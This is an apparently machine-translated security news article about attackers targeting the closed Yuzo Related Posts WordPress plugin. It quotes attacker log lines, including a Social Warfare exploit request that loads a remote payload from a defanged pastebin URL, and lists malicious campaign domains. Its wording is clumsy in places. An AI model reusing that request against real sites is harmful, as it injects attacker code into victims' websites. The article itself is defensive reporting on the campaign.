Wednesday, April 24, 2019
Home Entertainment Attacks on closed WordPress plugins

Attacks on closed WordPress plugins

The WordPress plugin repository team can "plug in" plugins and limit downloads when they hear about a security issue that developers can not fix quickly.

However, bad actors actively monitor the WordPress plugin repository and pay close attention to these closed plugins. This can lead to massive attacks if the attacker can detect and exploit the vulnerability.

That's the case for the plugin Yuzo-related post execution 12/5/91 This was closed on March 30, so new users could not download it. But last time we looked 60,000+ active installations.

Yuzo-related post-plugin
Yuzo Related Post WordPress Plugin

Unfortunately, bad actors caused the sites to be searched for this plugin to see if it was installed:

140.143.195.86 - - [08/Apr/2019:22:56:29 +0000] "GET /wp-content/plugins/yuzo-related-post/assets/js/admin.js HTTP / 1.1" - - "-" "Mozilla / 5.0 (Windows NT 6.1; Win64; x64; rv: 64.0) Gecko / 20100101 Firefox / 64.0 "

Addition to an existing malicious campaign

We recently reported how attackers abused multiple plugins by injecting malicious scripts into them. This is a typical, current example of how this Malare campaign targets websites with a vulnerable Social Warfare plug-in:

140.143.195.86 - - [08/Apr/2019:22:56:35 +0000] "GET /wp-admin/admin-ajax.php?swp_debug=load_options&swp_url=hxxps: // pastebin[.]de / raw / HeKe9uqn HTTP / 1.1 "- 0" - "" - "

We see that new domains are also used:

clevertrafficincome[.]com - Creation Date: 2019-04-05
Hellofromhony[.]org - Creation Date: 2019-04-09
notifymepush[.]info
Pushmeandtouchme[.]info

As we can see from the original IP address, this malware campaign has the Yuzo-related post Plugin into their list of goals.

Details of the vulnerability

especially the Yuzo-related post Plugin has one unauthenticated cross-site scripting Error. Several other vulnerabilities were also not resolved – this was the main reason why the WordPress team had closed it.

In order to give users time to remove this plugin from their websites, we do not provide any further details here. Remember that attackers are already exploiting it.

Today, April 10, 2019, we see many posts about hacks from sites using the plugin in the WordPress support forum. The plugin author even had to announce that the plugins should be uninstalled immediately.

Remove the Youzo post plugin immediately
Remove the Youzo post plugin immediately

If you can not remove this plugin, we recommend that you add a second level of security that virtually fixes vulnerabilities if developers do not solve the security issues.

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Must Read

Lose Weight with a Food Diary – Easier Than Thought

Lose weight with a food diary: Less complicated than expected Which food ends up on the plate? How big are the portions? And how much...

In western Libya, anti-Haftar fight against "new Gaddafi"

At twenty, Mohamad is in his second war: in 2016 against the Islamic State group, today against Marshal Haftar. A native of...

“What a love, you what?” The former wife of marriage with Krasko – Rambler / news

The third and fourth wives of the actor Ivan Krasko never loved him. About this Natalia Vyal (third wife) told "Komsomolskaya Pravda". Now, 42-year-old Vyal...

Coherent and focused discourse, a fundamental tool of Guaidó

April 23, 2019 10:30 PM | Updated on April 23, 2019 22:58 PM Experts agree that the president in charge of the Republic, Juan Guaidó, has gained...